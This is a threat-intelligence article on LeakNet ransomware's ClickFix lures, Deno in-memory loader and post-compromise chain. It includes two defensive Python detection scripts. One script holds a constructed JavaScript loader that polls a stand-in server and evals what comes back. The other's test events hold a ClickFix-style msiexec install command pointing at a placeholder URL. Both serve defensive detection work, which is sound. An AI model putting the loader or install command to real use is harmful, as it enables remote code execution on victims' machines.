
Unveiling the Tactics of LeakNet Ransomware: ClickFix Exploitation and Deno In-Memory Loader Deployment


The ransomware group LeakNet has shifted its tactics, using the ClickFix social engineering technique, delivered through compromised websites, to gain initial access.

The approach tricks users into running malicious commands themselves under the pretext of fixing a non-existent error or verification problem. It is a departure from the group's earlier reliance on stolen credentials bought from initial access brokers (IABs), according to a technical report by ReliaQuest.

Another notable aspect of these attacks is the use of a staged command-and-control (C2) loader based on the Deno JavaScript runtime to execute malicious payloads directly in system memory.

According to the cybersecurity company, the consistent post-exploitation sequence observed in these attacks provides defenders with identifiable behaviors to detect and disrupt at each stage before the deployment of ransomware, regardless of the initial entry point.

LeakNet, which emerged in November 2024, has positioned itself as a “digital watchdog” advocating for internet freedom and transparency, while also targeting industrial entities, according to data from Dragos.

The adoption of ClickFix by LeakNet offers several advantages, including reduced reliance on third-party suppliers, lower acquisition costs per victim, and elimination of operational delays associated with waiting for valuable accounts to become available.

In these attacks, compromised legitimate websites present a fake CAPTCHA verification check that instructs the visitor to paste and run a "msiexec.exe" command in the Windows Run dialog. Because msiexec.exe is a legitimate, signed Windows binary, the resulting execution looks like ordinary installer activity. The campaign is not sector-specific; it aims to infect as many victims as possible.

As more threat actors embrace the ClickFix tactic, exploiting trusted workflows to deceive users into running rogue commands via legitimate Windows tools, LeakNet’s adoption of this method represents a significant strategic shift, as noted by ReliaQuest.


By moving away from IABs, LeakNet removes an operational bottleneck and can run faster and broader campaigns. Delivering ClickFix through compromised legitimate websites also means the victim's first contact looks like ordinary browsing to a trusted site, leaving little for network-level monitoring to flag.

Beyond ClickFix for initial access, LeakNet is suspected of using a Deno-based loader that executes Base64-encoded JavaScript in memory, keeping on-disk artifacts to a minimum and evading file-based detection. The loader fingerprints the compromised host, contacts an external server to retrieve the next stage, and then repeatedly fetches and executes additional code through the Deno runtime, so the payload never needs to be written to disk as a file.
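To show what an analyst can do with a Deno command line of the kind described above, the following is an added example for this article; it is not the loader's own code and not ReliaQuest tooling. It assumes the encoded script is passed inline on the command line (for instance via `deno eval`) and that loader behaviour is visible as `fetch`, `eval` and `Deno.*` fingerprinting calls in the decoded text; the invocation and script it triages are constructed for illustration, and the Base64 length threshold is an assumption.

```python
"""Triage helper for a Deno command line carrying a Base64-encoded inline script.

Added example for this article; it is not the loader's own code and not ReliaQuest
tooling. It assumes the encoded script is passed inline on the command line (for
instance via `deno eval`); the invocation below is constructed for illustration."""
import base64
import binascii
import re

# A Base64 run long enough to be a script rather than an identifier (threshold assumed).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Behaviours the article attributes to the loader, expressed as indicators in decoded JS.
INDICATORS = {
    "fingerprint": re.compile(r"Deno\.(hostname|osRelease|build)\b"),
    "remote_fetch": re.compile(r"\bfetch\s*\("),
    "dynamic_eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "beacon_loop": re.compile(r"\bwhile\s*\(\s*true\s*\)|\bfor\s*\(\s*;\s*;\s*\)|\bsetInterval\s*\("),
}


def decode_blobs(cmdline):
    """Return every Base64 token in cmdline that decodes to readable text."""
    scripts = []
    for match in B64_TOKEN.finditer(cmdline):
        token = match.group(0)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not Base64, or not text: leave it for binary analysis
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            scripts.append(text)
    return scripts


def triage(cmdline):
    """Decode inline scripts and list which loader behaviours each one exhibits."""
    return [
        {"script": js, "indicators": sorted(n for n, rx in INDICATORS.items() if rx.search(js))}
        for js in decode_blobs(cmdline)
    ]


def verdict(cmdline):
    """'loader' when a decoded script both pulls remote content and evaluates code."""
    for finding in triage(cmdline):
        if {"remote_fetch", "dynamic_eval"} <= set(finding["indicators"]):
            return "loader"
    return "benign_or_unknown"


# Constructed sample: a script that fingerprints the host, polls a fictional server
# and evaluates whatever it returns, wrapped the way an inline loader might pass it.
SAMPLE_JS = (
    "const id={h:Deno.hostname(),o:Deno.build.os};"
    "(async()=>{for(;;){const r=await fetch('https://c2.example/'+id.h);"
    "eval(await r.text());await new Promise(s=>setTimeout(s,60000));}})();"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_JS.encode()).decode()
SAMPLE_CMDLINE = (
    '"C:\\Users\\alice\\.deno\\bin\\deno.exe" eval "eval(atob(\'' + SAMPLE_B64 + "'))\""
)
# Constructed benign invocation: no inline blob, nothing to decode.
BENIGN_CMDLINE = '"C:\\Users\\alice\\.deno\\bin\\deno.exe" run --allow-net main.ts'

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINE):
        print(finding["indicators"])
        print(finding["script"])
    print(verdict(SAMPLE_CMDLINE), verdict(BENIGN_CMDLINE))
```

The decoded script, not the command line, is what carries the evidence: a long Base64 argument on its own is only suspicious, while a decoded body that both fetches remote content and passes the result to `eval` is the in-memory staging behaviour the report describes. Blobs that fail to decode as UTF-8 text are skipped rather than flagged, since they may be legitimate packed data.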

ReliaQuest also documented an intrusion attempt where threat actors utilized Microsoft Teams-based phishing to trick a user into launching a payload chain culminating in a Deno-based loader. This activity, while unattributed, suggests a potential expansion of LeakNet’s initial access methods or adoption of the technique by other threat actors.

LeakNet's post-compromise activity follows a consistent pattern: DLL side-loading to execute a malicious DLL delivered by the loader, lateral movement with PsExec, data exfiltration, and finally encryption.

For staging and exfiltration, LeakNet uses S3 buckets, because outbound traffic to S3 blends in with normal cloud usage and is less likely to be flagged.
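The report's point is that each stage of this sequence, from the ClickFix msiexec launch through the Deno loader, DLL side-loading, PsExec and S3 exfiltration, leaves a distinct host-level signal that can be correlated before encryption begins. The following is an added example for this article, not ReliaQuest detection content: the event schema (dict fields such as "type", "image", "parent", "cmdline") is an assumption loosely modelled on Sysmon-style telemetry, the thresholds and the S3 client allowlist are assumptions, and every event it processes is constructed.

```python
"""Correlating the stages of the post-compromise sequence described above, per host.

Added example for this article, not ReliaQuest detection content. The event schema
is an assumption loosely modelled on Sysmon-style telemetry, and every event below
is constructed."""
import re
from collections import defaultdict

# Thresholds and allowlists here are assumptions, not published indicators.
B64_ARG = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
S3_HOST = re.compile(r"(^|\.)s3([.-][a-z0-9-]+)?\.amazonaws\.com$")
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
ALLOWED_S3_CLIENTS = {"aws.exe"}  # assumed per-environment allowlist of backup/sync tools


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    return path.rsplit("\\", 1)[0].lower()


def is_clickfix(ev):
    # Run-dialog ClickFix: explorer.exe spawning msiexec.exe that installs from a URL
    return (ev["type"] == "process" and basename(ev["image"]) == "msiexec.exe"
            and basename(ev["parent"]) == "explorer.exe"
            and re.search(r"https?://", ev["cmdline"], re.IGNORECASE) is not None)


def is_deno_loader(ev):
    # Deno evaluating inline code that carries a long Base64 blob
    cmdline = ev.get("cmdline", "")
    return (ev["type"] == "process" and basename(ev["image"]) == "deno.exe"
            and " eval " in f" {cmdline} " and B64_ARG.search(cmdline) is not None)


def is_dll_sideload(ev):
    # A DLL loaded from a user-writable directory by an executable in that same directory
    return (ev["type"] == "imageload"
            and dirname(ev["image"]) == dirname(ev["loaded"])
            and USER_WRITABLE.search(ev["loaded"]) is not None)


def is_psexec(ev):
    # PsExec lateral movement installs the PSEXESVC service on the target host
    return ((ev["type"] == "service" and ev["name"].upper() == "PSEXESVC")
            or (ev["type"] == "process" and basename(ev["image"]) == "psexesvc.exe"))


def is_s3_exfil(ev):
    # Outbound connection to an S3 endpoint from something other than an allowlisted client
    return (ev["type"] == "network"
            and S3_HOST.search(ev["dest_host"].lower()) is not None
            and basename(ev["image"]) not in ALLOWED_S3_CLIENTS)


# Stages in the order the article reports them.
RULES = [("clickfix", is_clickfix), ("deno_loader", is_deno_loader),
         ("dll_sideload", is_dll_sideload), ("psexec", is_psexec), ("s3_exfil", is_s3_exfil)]
EXPECTED_ORDER = [name for name, _ in RULES]


def correlate(events):
    """Return {host: [stages in the order first observed]} for hosts with any hit."""
    seen = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for stage, predicate in RULES:
            if predicate(ev) and stage not in seen[ev["host"]]:
                seen[ev["host"]].append(stage)
    return dict(seen)


def in_expected_order(stages):
    """True when the observed stages follow the documented chain, allowing gaps."""
    positions = [EXPECTED_ORDER.index(s) for s in stages]
    return positions == sorted(positions)


# Constructed events: WS01 walks the whole chain, WS02 shows look-alike benign activity.
EVENTS = [
    {"ts": 1, "host": "WS01", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "msiexec.exe /i https://captcha-check.example/verify.msi /qn"},
    {"ts": 2, "host": "WS01", "type": "process", "image": r"C:\Users\alice\.deno\bin\deno.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "deno.exe eval \"eval(atob('" + "Q" * 80 + "'))\""},
    {"ts": 3, "host": "WS01", "type": "imageload",
     "image": r"C:\Users\alice\AppData\Local\Temp\upd\vendor.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\upd\version.dll"},
    {"ts": 4, "host": "WS01", "type": "service", "name": "PSEXESVC"},
    {"ts": 5, "host": "WS01", "type": "network",
     "image": r"C:\Users\alice\AppData\Local\Temp\upd\vendor.exe",
     "dest_host": "staging-bucket.s3.us-east-1.amazonaws.com"},
    {"ts": 6, "host": "WS02", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\bob\Downloads\app.msi"},
    {"ts": 7, "host": "WS02", "type": "network",
     "image": r"C:\Program Files\Amazon\AWSCLIV2\aws.exe",
     "dest_host": "backup.s3.amazonaws.com"},
]

if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(host, stages, "ordered" if in_expected_order(stages) else "out of order")
```

The side-loading rule is the noisiest of the five: many legitimate applications installed under a user profile load their own DLLs from the same directory, so in practice it needs an allowlist or a signature check on the loaded module. The value of correlating is that a single noisy hit does not matter much, while two or three stages on the same host in the documented order is worth a response before the encryption stage arrives.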

Google recently identified Qilin (Agenda), Akira (RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (FireFlame and FuryStorm), and Sinobi as the top 10 ransomware brands with the highest number of victims on their data leak platforms.

Google’s Threat Intelligence Group (GTIG) reported that roughly one third of ransomware incidents involved confirmed or suspected exploitation of vulnerabilities, particularly in widely deployed VPN and firewall products. In addition, 77% of analyzed ransomware attacks included suspected data theft, up from 57% in 2024.


Despite ongoing disruptions in the ransomware landscape, threat actors remain highly motivated, with a shift towards targeting smaller organizations in higher-volume attacks as profitability from larger companies declines.
